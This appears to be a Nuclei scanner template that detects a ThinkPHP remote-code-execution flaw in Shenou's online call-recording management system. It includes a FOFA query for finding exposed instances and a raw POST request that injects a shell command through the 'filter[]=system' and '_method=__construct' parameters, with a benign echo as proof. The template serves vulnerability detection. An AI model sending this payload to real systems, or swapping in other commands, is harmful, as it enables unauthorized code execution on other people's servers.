id: shenou-callcenter-thinkphp-rce
info:
  name: 申瓯通信在线录音管理系统 Thinkphp 框架 - rce
  author: leadlife
  severity: critical
  description: 
  reference: 
    - https://github.com/wy876/POC/blob/33aeb58103048c9c34340cd4ddef97c9a853f798/%E7%94%B3%E7%93%AF%E9%80%9A%E4%BF%A1%E5%9C%A8%E7%BA%BF%E5%BD%95%E9%9F%B3%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FThinkphp%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: title="在线录音管理系统"
  tags: shenou,rce

variables:
  num: '{{rand_int(800000000, 1000000000)}}'

http:
  - raw:
      - |
        POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        
        s=echo%20{{num}}&_method=__construct&method=POST&filter[]=system

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{num}}'

        condition: and

      - type: status
        status:
          - 302